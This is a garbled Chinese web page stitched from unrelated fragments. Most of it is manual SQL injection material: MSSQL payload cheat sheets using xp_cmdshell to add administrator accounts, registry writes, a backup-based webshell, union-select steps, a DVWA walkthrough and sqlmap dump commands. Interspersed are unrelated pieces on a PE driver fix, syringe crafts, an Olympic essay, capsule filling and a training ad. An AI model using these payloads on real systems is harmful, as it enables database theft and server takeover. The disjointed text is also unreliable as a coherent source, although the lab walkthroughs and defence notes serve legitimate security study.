手工注入

注⼊命令⼿⼯注⼊命令⼤全1.判断是否有注⼊;and 1=1 ;and 1=22.初步判断是否是mssql ;and user>03.注⼊参数是字符'and [查询条件] and ''='4.搜索时没过滤参数的'and [查询条件] and '%25'='5.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from msysobjects)>0 access6.猜数据库 ;and (select Count(*) from [数据库名])>07.猜字段 ;and (select Count(字段名) from 数据库名)>08.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>09.(1)猜字段的ascii值（access）;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0(2)猜字段的ascii值（mssql）;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>010.测试权限结构（mssql）;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--;and 1=(select IS_MEMBER('db_owner'));--11.添加mssql和系统的帐户;exec master.dbo.sp_addlogin username;--;exec master.dbo.sp_password null,username,password;--;execmaster.dbo.sp_addsrvrolemember sysadmin username;--;exec master.dbo.xp_cmdshell 'net user username password/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--;exec master.dbo.xp_cmdshell 'net user username password /add';--;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--12.(1)遍历⽬录;create table dirs(paths varchar(100), id int);insert dirs exec master.dbo.xp_dirtree 'c:\';and (select top 1 paths from dirs)>0;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)(2)遍历⽬录;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得⼦⽬录列表;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有⼦⽬录的⽬录树构;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看⽂件的内容13.mssql中的存储过程xp_regenumvalues 注册表根键, ⼦键;exec xp_regenumvalues'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集⽅式返回所有键值xp_regread 根键,⼦键,键值名;exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值xp_regwrite 根键,⼦键, 值名, 值类型, 值值类型有2种REG_SZ 表⽰字符型,REG_DWORD 表⽰整型;exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'写⼊注册表xp_regdeletevalue 根键,⼦键,值名exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'删除键,包括该键下所有值14.mssql的backup创建webshelluse modelcreate table cmd(str image);insert into cmd(str) values ('');backup database model to disk='c:\l.asp';15.mssql内置函数;and (select @@version)>0 获得Windows的版本号;and user_name()='dbo' 判断当前系统的连接⽤户是不是sa;and (select user_name())>0 爆当前系统的连接⽤户;and (select db_name())>0 得到当前连接的数据库16.简洁的webshelluse modelcreate table cmd(str image);insert into cmd(str) values ('');backup database model to disk='g:\wwwtest\l.asp';。

全程图解手工注入声明：原创文章，转载请指名来自华夏黑客联盟（），违者必究！回忆起刚学注入的时候，网上的教程杂乱无章，更郁闷的是。

文章被无数次转载，很多常用的命令都出现错误，导致学习的很慢，差点对手工注入失去了信心。

为了帮助初学者学习手工注入，从盲注和sql显错方式注入详细的写了图解教程，希望对初学者有帮助。

第一部分盲注过程（使用了access数据库）一、寻找注入点：使用经典的1=1 和1=2测试法输入http://127.0.0.1/shop/Shop(Access)/looknews.asp?id=26，显示输入http://127.0.0.1/shop/Shop(Access)/looknews.asp?id=26 and 1=1时，显示输入http://127.0.0.1/shop/Shop(Access)/looknews.asp?id=26 and 1=2时，显示发生异常，存在注入漏洞.二、判断数据库类型（一）iis允许返回错误的情况输入http://127.0.0.1/shop/Shop(Access)/looknews.asp?id=26 and user > 0，显示“Microsoft JET Database Engine (0x80040E07)标准表达式中数据类型不匹配”，表明数据库为Access。

（二）如果服务器IIS不允许返回错误，就从从Access和SQLServer和区别入手。

Access 和 SQLServer都有自己的系统表，比如存放数据库中所有对象的表，Access是在系统表[msysobjects]中，但在Web环境下读该表会提示“没有权限”，SQLServer是在表[sysobjects]中，在Web环境下可正常读取。

输入http://127.0.0.1/shop/Shop(Access)/looknews.asp?id=26and (select count(*) from msysobjects)>0，显示如下图，由此可判断数据库类型为Access。

1、进PE，能够正常识别硬盘-->找到硬盘的ID号-->通过Service找到驱动
上图可以找出在PE中是用msahci.sys来驱动的，可以将这个驱动拷贝出来备用。

2、在PE中将硬盘系统system注册表挂载出来（当然，在此之前至少进一次蓝屏的系统，这个肯定的，因为蓝屏了我们才用这个方法。

）-->根据前面的ID找到service -->查看service，将驱动改成前面备份出来的驱动的名称，如msahci.sys
，再将驱动文件放一份到硬盘系统%Windir%\system32\drivers下，应该就可以启动了。

大家可以看到，硬盘系统中驱动的service并不一样，这里是amd_sata，这个一般不要改动，我前面就直接改服务的，如这个改成与PE一样的“msahci”，但启动正常进入后，再启就不行了，系统自动将这个service变回去了。

因此，服务名不要改。

system32\drivers\msahci.sys。

字符型手工注入原理字符型手工注入原理是一种常见的网络安全攻击方式，是指攻击者通过修改某个输入框的字符组合，达到绕过一些基本的身份认证或过滤机制，实现对网站或者应用的攻击或者恶意操作的行为。

如何保护自己应用系统不被字符型手工注入攻击呢？需要了解字符型手工注入原理和相关防御措施。

一、字符型手工注入的原理字符型手工注入原理是最常见的网络攻击方式之一，一些安全性较低的应用、网站以及业务系统，常常会被攻击者利用字符型手工注入原理进行攻击。

字符型手工注入的主要原理是攻击者在输入框中输入一些带着恶意特殊字符的语句，然后通过提交操作传给后台解析引擎时，在解析阶段执行特殊操作，达到绕过一些基本的身份认证或过滤机制，从而实现对网站或应用的攻击或恶意操作行为。

二、字符型手工注入的危害1、破坏数据：攻击者能够注入一些破坏性的代码，在数据库中进行删除、修改、插入和清空等操作，造成严重的后果。

2、盗取数据：通过注入一些查询命令，用来查询不该被查询的敏感数据，比如用户名、密码、银行卡号以及支付宝账号等重要信息。

3、攻击漏洞：攻击者通过手工注入方式，不断测试应用中的各种漏洞，破坏应用的稳定性和安全性。

三、字符型手工注入的防御1、完善身份认证：进行身份认证的措施是防御字符型手工注入的一个有效办法。

对于不同的操作权限，进行严格控制，必须判断当前操作是否属于合法用户。

2、过滤特殊字符：对于在输入框中输入的内容，进行过滤和转义处理，将用户输入内容中的特殊字符变成普通字符，可以有效地防止攻击者在输入框中插入修改数据。

比如在PHP代码中，可以用addslashes()、mysql_real_escape_string()等函数来完成数据过滤工作。

3、限制数据输入范围：有些输入框是用来输入只能是特定字符的数据，比如日期时间，电话号码等等，可以在输入框的默认状态下限制输入的字符类型。

4、对数据进行加密：对于网站使用敏感数据存储，需要对数据进行加密处理。

用注射器可以做什么手工
使用注射器进行手工创作是一种有趣的创意活动，可以制作各种有趣的手工作品。

以下是一些用注射器进行手工的创意主意：
1. 涂鸦艺术：将不同颜色的水彩或墨水注入注射器中，然后在画纸上进行涂鸦、绘画或书写。

通过控制注射器的压力和速度，可以创造出独特的艺术效果。

2. 绘制彩色背景：用注射器将彩色墨水或水彩液滴在画纸上，创造出丰富多彩的背景效果，然后在上面绘制其他图案或图像。

3. 装饰卡片和信封：使用注射器在卡片或信封上喷洒彩色墨水或水彩液，创造出独特的装饰效果，使卡片和信封更加美观。

4. 喷墨腐蚀画：将稀释的墨水注入注射器，然后将墨水喷洒在特定的绘画板上，形成腐蚀效果，创造出独特的艺术作品。

5. 粘贴工艺：用注射器将色彩鲜艳的液体胶水注入，然后将小珠子、亮片或其他装饰物粘贴在画纸或其他表面上，制作出闪闪发光的手工作品。

6. 纸张染色：将不同颜色的染料液注入注射器，然后将染料滴在白纸或其他纸张上，创造出独特的纹理和图案。

请注意，在进行这些手工创作时，需要小心操作，避免染料或墨水溅到衣物或家具上，同时确保使用无毒、环保的材料，保持良好的通风环境。

这些创意活动可以激发您的想象力和创造力，让您享受手工艺术的乐趣。

刘翔，我们爱的是你，不是金牌作文
雅典奥运会上，刘翔110米跨栏用秒的几个瞬间打破了世界纪录。

从此，13亿中国人给他了太大的希望、鼓励与支持，希望他能够在29届奥运会上取得更好的成绩。

可是，有谁曾想过，这对于25岁的刘翔，是多大的一种压力啊。

4年后，北京奥运会110米栏赛场上，再次出现了刘翔的身影。

13亿中国人以“只许成功，不许失败”的心情等待刘翔登上领奖台那刻。

然而，当我们再次看到赛场时，望见的是刘翔离开赛场的身影??刘翔因右脚跟腱伤势退出了比赛。

顿时，志愿者们哭了，观众们哭了，13亿中国人都哭了。

那天下午，一位朋友来我家找我玩时，三句话离不开刘翔。

“一些人太不通情达理了，他们为什么要靠刘翔拿金牌，为什么不自己去拿，甚至有的人还在赛场上破口大骂！”
“是啊，有同感。

刘翔退出比赛这个选择是对的，在某些场合上，我们就应该学会放弃。

”
………
‘写给刘翔哥哥’
哭吧哭吧，男儿哭吧哭吧不是罪。

刘翔哥哥，不用想，你此刻一定很伤心，没能参加中国首次举办的奥运会。

也许你会想：你使13亿中国人失望了。

不，没有。

刘翔哥哥，我们爱的是你，不是金牌我们一直支持着你，爱你一百年，一千年，一万年，一亿年。

不管输还是赢。

刘翔哥哥，哭完了吗？哭完后，站起来，坚强些。

希望你在30届奥运会上，想你的名字一样，再次飞翔，再次腾飞。

当然，输赢不是最重要的，成功永远是属于坚强者的，加油。

祝；
早日康复
2008年8月19日
XXX
PS：请推荐者不要修改格式，谢谢合作。

MSSQL注⼊常⽤SQL语句整理很多情况下使⽤⼯具对mssql注⼊并不完善,所以我们就需要⼿⼯注⼊,⼀下是本⼈收集的⼀些mssql的sql语句.⼿⼯MSSQL注⼊常⽤SQL语句and exists (select * from sysobjects) //判断是否是MSSQLand exists(select * from tableName) //判断某表是否存在..tableName为表名and 1=(select @@VERSION) //MSSQL版本And 1=(select db_name()) //当前数据库名and 1=(select @@servername) //本地服务名and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限and 1= (Select HAS_DBACCESS('master')) //判断是否有库读取权限and 1=(select name from master.dbo.sysdatabases where dbid=1) //暴库名DBID为1，2，3….;declare @d int //是否⽀持多⾏and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') //判断XP_CMDSHELL是否存在and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread') //查看XP_regread扩展存储过程是不是已经被删除添加和删除⼀个SA权限的⽤户test：（需要SA权限）exec master.dbo.sp_addlogin test,passwordexec master.dbo.sp_addsrvrolemember test,sysadmin停掉或激活某个服务。

SQL注⼊常⽤命令1. 数据库查询版本Mssql select @@versionMysql select vresion（）/select @@versionoracle select banner from ￥versionPostgresql select version（）2. 数据库常⽤命令库操作连接数据库 mysql -u ⽤户名 -p创建数据库：create database 数据库名称、删除数据库 drop database 数据库名称、列出数据库 show databases使⽤数据据库 use 数据库名称、查看当前数据库 select database（）表操作新建表create table 表名（键 varchar（10），键int（10））列出表 show tables删除表 delete 表名数据操作增加数据insert into 表名（键，键）values（值，值）删除数据 delete from 表名 where 键=值（删除某⼀⾏数据）修改数据 updata 表名 set 键 = 值 where 键=值查询数据 select * fom 表名存放数据库 information_ schema（存放schemata、 table、columns等等）存放数据库名 schemata表 table字段 columns3. SQL⼿⼯注⼊步骤注⼊点寻找判断请求⽅式浏览器F12 点⽹络单引号闭合’ ‘数字单引号括号闭合（’ ‘）双引号括号闭合（“ ”）or 1=1or 1=2and 1=1and 1=2数字型注⼊加单引号错误出异常and 1=1 正常and 1=2 异常字符型注⼊加单引号错误出异常and ‘1’ = '1 正常and ‘1’ = '2 异常判断字段长度order by 数字可以判断字段的个数也可以⽤猜字段 union select 1，2，3判断字段回显位置在链接后⾯添加语句【 union select 1,2,3,4,5,6,7,8,9,10,11#】进⾏联合查询（联合查询时记得把前⾯的查询为空）来暴露可查询的字段号。

手工填充硬胶囊的操作流程下载温馨提示:该文档是我店铺精心编制而成，希望大家下载以后，能够帮助大家解决实际的问题。

文档下载后可定制随意修改，请根据实际需要进行相应的调整和使用，谢谢!并且，本店铺为大家提供各种各样类型的实用资料，如教育随笔、日记赏析、句子摘抄、古诗大全、经典美文、话题作文、工作总结、词语解析、文案摘录、其他资料等等，如想了解不同资料格式和写法，敬请关注!Download tips: This document is carefully compiled by theeditor. I hope that after you download them,they can help yousolve practical problems. The document can be customized andmodified after downloading,please adjust and use it according toactual needs, thank you!In addition, our shop provides you with various types ofpractical materials,such as educational essays, diaryappreciation,sentence excerpts,ancient poems,classic articles,topic composition,work summary,word parsing,copy excerpts,other materials and so on,want to know different data formats andwriting methods,please pay attention!手工填充硬胶囊的操作流程一般包括以下步骤：1. 准备工作：- 确保工作环境清洁、干燥。

sql 注入原理手工联合查询注入技术的一般步骤SQL注入是指攻击者通过构造恶意的SQL语句，从而绕过应用程序的输入验证，成功执行非法的SQL语句，进而对数据库进行非法操作，如获取、修改、删除、新增数据等。

手工联合查询注入技术是一种常见的SQL注入技术之一，通过对系统的盲注漏洞进行利用，来获取数据库中的信息。

一般来说，手工联合查询注入的步骤如下：1.扫描目标：首先需要确认目标网站是否存在SQL注入漏洞，通过手动触发不同的输入参数进行测试。

可以通过在输入参数中输入'或者"等字符，观察是否出现报错信息或页面布局异常等情况。

如果发现异常表现，就有可能存在注入漏洞。

2.确定注入点：确认存在注入漏洞后，需要确定具体的注入点。

通过逐个尝试不同的输入参数，观察是否可以控制SQL语句的执行。

可以通过在输入参数中添加单引号或双引号等特殊字符，观察是否出现报错信息或者页面响应异常等情况。

3.判断注入类型：在确定注入点之后，需要判断注入类型。

根据不同的数据库类型，注入的方式也有所不同。

常见的注入类型有：布尔注入、时间延迟注入、报错注入等。

可以通过构造不同的payload，观察页面的响应情况，判断注入类型。

4.探测数据库：在确认注入类型之后，开始探测数据库信息。

可以通过union select语句来获取数据库的结构和数据。

通过逐个尝试不同的列名和表名，直到成功获取相关的数据。

可以通过构造payload，将union select语句插入到原始的SQL语句中，从而获取目标数据。

5.获取具体信息：一旦成功获取数据库的结构和数据，就可以继续获取具体的敏感信息。

通过逐个尝试不同的表和列，获取目标数据。

可以利用union select或者其他相关的SQL语句，提取需要的数据。

可以通过子查询、联合查询等方法，来获取更加复杂的数据。

6.利用漏洞：在成功获取目标信息后，可以通过利用注入漏洞来执行其他相关的操作。

可以进行数据的修改、删除、新增等操作。

sql 注入原理手工联合查询注入技术的一般步骤SQL注入原理手工联合查询注入技术的一般步骤SQL注入是指黑客通过构造恶意的SQL语句，成功地将恶意代码注入到应用程序的数据库中，从而绕过应用程序的验证和控制，获取数据库中的敏感信息或者对数据库进行恶意操作。

手工联合查询注入技术是一种常见的SQL注入方法，通过利用SQL查询中的联合查询操作，可以获取非授权的数据库信息。

下面将介绍手工联合查询注入技术的一般步骤：1. 识别目标：首先需要确定目标网站是否存在SQL注入漏洞。

可以通过输入特殊字符 ' 或者 " 等来判断是否存在注入漏洞。

如果网站没有对特殊字符进行处理，可能存在注入漏洞。

2. 确定数据库类型：通过注入语句来判断数据库的类型。

不同的数据库有不同的语法和特点，需要根据目标网站的数据库类型来选择合适的注入语句。

3. 获取数据库表名：通过联合查询来获取数据库中的表名信息。

一般情况下，可以通过输入 ' union select 1,2,3...N from information_schema.tables -- ' 这样的注入语句来获取表名信息。

其中，N为数据库中表的数量。

4. 获取列名：在知道了表的名称后，可以通过联合查询进一步获取表中的列名信息。

注入语句类似于 ' union select 1,2,3...N from information_schema.columns where table_name='表名' -- '。

其中，N为表中的列数。

5. 获取数据：通过联合查询来获取表中的具体数据。

注入语句类似于 ' union select 1,2,3...N from 表名 -- '。

其中，N为列数。

通过不断调整列数，可以逐步获取表中的数据。

6. 在获取到敏感信息后，需要将漏洞报告给网站管理员，并提供详细的复现步骤和建议修复措施。

匠心品质的手工艺人手工艺人是一群热爱艺术和手工艺品制作的人，他们以匠心和品质为核心价值，坚持通过手工制作来创造独特的艺术作品。

他们将自己的技术、创意和精神注入到每一个作品中，使每一个作品都具有独特的魅力和价值。

首先，匠心是手工艺人制作作品的核心。

匠心是指手工艺人对艺术的热爱和追求，他们对细节的关注和对完美的追求。

手工艺人在制作作品的过程中，会不断思考和琢磨，力求突破常规、创造新的表达方式。

他们将自己的心思和个人风格注入到每一件作品中，使作品充满独特的艺术气息。

其次，品质是手工艺人作品的保证。

品质是指作品在材料、工艺和手工技术上的严格要求和精益求精的态度。

手工艺人会选择高质量的材料，通过精湛的工艺和熟练的手工技术，制作出精美、耐用的作品。

他们会对每一个细节进行精益求精的处理，保证作品的质量和持久性。

手工艺人的作品不仅具有高品质，还具有独特的魅力。

在批量生产和机器制造的今天，手工艺品的独特性更加显著。

手工艺人通过手工制作，为作品注入了热情和个性，每一个作品都是独一无二的。

手工艺品不仅可以满足人们的实用需求，还可以成为一种艺术品的收藏。

手工艺人的作品常常充满想象力和创造力，能够激发人们的审美和思考。

手工艺人的工作也是一种传承和创新。

手工艺人的技术和经验传承非常重要，他们会将自己所掌握的技术传授给后人，并不断与其他手工艺人进行交流和学习。

同时，手工艺人也在创新中发展。

他们不断尝试新的材料和工艺，探索新的设计风格和表达方式，推动着手工艺品的发展和更新。

手工艺人的工作是一种艺术和生活的结合。

手工艺人通过手工制作，将自己的创造力和才华转化为艺术作品，同时也获得了一种对生活的满足和奉献。

手工艺人的工作需要耐心和毅力，他们在对待作品的过程中也在培养自己的心性和品质。

手工艺人的工作不仅是一种技术，更是一种精神和态度。

总之，手工艺人以匠心和品质为核心价值，在手工制作的过程中注入自己的心思和个性，创造出独特、精美的艺术作品。

DVWA-SQL注⼊DVWA-SQL注⼊⼀、SQL注⼊概念SQL注⼊是指攻击者通过注⼊恶意的SQL命令,破坏SQL查询语句的结构,从⽽达到执⾏恶意SQL语句的⽬的。

⼆、⼿⼯注⼊常规思路1.判断是否存在注⼊，注⼊是字符型还是数字型2.猜解SQL查询语句中的字段数3.确定回显位置4.获取当前数据库5.获取数据库中的表6.获取表中的字段名7.得到数据三、DVWA注⼊分析将DVWA的级别设置为low1.分析源码，可以看到没有对参数做任何的过滤，直接带⼊数据库进⾏查询，分析sql查询语句，可能存在字符型sql注⼊。

2.判断sql是否存在存⼊，以及注⼊的类型1' and '1'='13.猜解SQL查询语句中的字段数3.1 1' order by 2#3.2 1' order by 3#3.3从上⾯两个图可以说明，SQL语句查询的表的字段数是24.确定显⽰的位置(SQL语句查询之后的回显位置)1' union select 1,2# #下图可以看出有2个回显5.查询当前的数据库，以及版本1' union select version(),database()#6.获取数据库中的表1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#7.获取表中的字段名1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#8.获得字段中的数据1' union select user,password from users#将DVWA的级别设置为Medium1.下图可以看到中级加⼊了⼀些防御，不让⽤户输⼊,只提供选择(可以⽤burpsuit抓包来绕过)，分析源码可以看到对参数使⽤mysql_real_escape_string函数转义sql语句中的⼀些特殊字符，查看sql查询语句可以看出可能存在数字型sql注⼊2.通过burpsuit抓包，修改数据包，绕过防御2.1判断注⼊点，以及注⼊的类型，下图可以看到，存在注⼊，注⼊类型是数字型注⼊2.2猜解sql查询语句中的字段的个数，下图说明字段的个数为22.3.确定回显的位置,下图可以说明有2个回显位置1 union select 1,2#2.4.获取当前数据库的名称以及版本1 union select database(),version()#2.5获取数据库中的所有表1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#2.6获取表中的所有字段名考虑到单引号被转义，可以利⽤ 16 进制进⾏绕过union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #2.7获取字段中的数据1 union select user,password from users#将DVWA的级别设置为High1.将dvwa设置为⾼级，可以看出，点击”here to change your ID”，页⾯⾃动跳转，防御了⾃动化的SQL注⼊，分析源码可以看到，对参数没有做防御，在sql查询语句中限制了查询条数，可以通过burpsuit抓包，修改数据包实现绕过 2.2获得密码将DVWA的级别设置为Impossible1.分析源码可以看到使⽤了PDO技术，杜绝了SQL注⼊。

SQL注⼊实战-MySQL-墨者学院今天我将⽤两种⽅法来讲解，第⼀种，SQLMap⾃动化跑数据库，第⼆种，利⽤⽕狐的hackbar来⼿⼯注⼊。

【第⼀种】1.先看这个url：，⼀般来说都是id=⼀个数字，这个MQo=是属于base64加密，加密规律、规则请参考百度百科。

2.⽤SQLMap的tamper插件，语句：sqlmap.py -u –tamper base64encode.py –dbs –level 3（SQLMap下有tamper这个⽂件夹，下⾯有base64encode.py这个插件），可以看到爆出来两个数据库。

2.继续爆表，语句：sqlmap.py -u –tamper base64encode.py –table -D test –level 3,爆出来data这个表3.继续爆字段，语句：sqlmap.py -u –tamper base64encode.py –columns -T data -D test –level 3，爆出来main这个字段4.开始脱裤，语句：sqlmap.py -u –tamper base64encode.py -D test -T data -C main,thekey,title –dump –level 3,脱裤成功，⽽且在下⾯这两个⽂件中都有保存。

**——————————————————————————————————————————分割线——————————————————————————————————————————**【第⼆种】1.⼿⼯注⼊，前⾯我们已经说过这个url：是经过base64加密的，解密之后我们知道这个MQo=其实是1，这个就需要我们每次注⼊的时候将正常的SQL语句转换成base64之后再注⼊，现在我将进⾏注⼊，上⾯的图⽚是正常⼀般操作，下⾯的图⽚是base64加密之后的，我们要执⾏的就是下⾯的加密过了的。

2.分别测试and 1=1和and1=2，发现and 1=2报错，则说明此处存在SQL注⼊漏洞3.⽤order by 2（数字随便改）来进⾏猜测，order by可以参考：4.然后⽤[加密后的为[？id=LTEgdW5pb24gc2VsZWN0IGRhdGFiYXNlKCksdmVyc2lvbigp]来进⾏注⼊发现这⾥⾯有test数据库，继续爆表名注：这⾥⽤-1是为了让它报错的。

培训方案
1、对学生知识的要求
对Windows、Linux及SQL语句有一定的了解即可
2、学生的知识能力提高
本课程重点培训学生的Web渗透测试能力，通过20天的渗透测试培训,学生可具备以下能力
1）、了解Web服务器的工作过程及原理
2）、了解HTTP协议
3)、学会渗透测试前踩点技能
4）、学会使用常见的渗透测试工具如burpsuite、SQLmap等等
5)、了解常见的系统攻击过程及手段
6）、学会常见的系统攻击方法
7）、学会Web服务器的信息获取
8）、学会IIS、Apache、tomcat、Weblogic等常见中间件的漏洞利用方式及加固方法9）、深入了解各类SQL注入漏洞的原理、攻击手段及加固措施
10）、掌握上传漏洞、命令执行漏洞、XSS漏洞等常见Web漏洞的利用方式及技巧11）、掌握各类提权方法
12)、掌握各类第三方插件/程度的漏洞利用方法
3、考试及颁发证书
暂无，可有
4、培训案例分析
安云科技针对学生每年举办两次定期培训，现已经举办了4次针对学生的培训,同时，受邀给青岛工学院、济南职业技术学院、山东警察学院等学校的老师进行培训
关于提升就业问题:现阶段，国家对信息安全的重视及网络安全行业的火爆，但人才短缺,安全行业的薪资也普遍高于其它行业，据调查，目前山东省内所有安全公司都面临人员不足的情况
5、培训课程。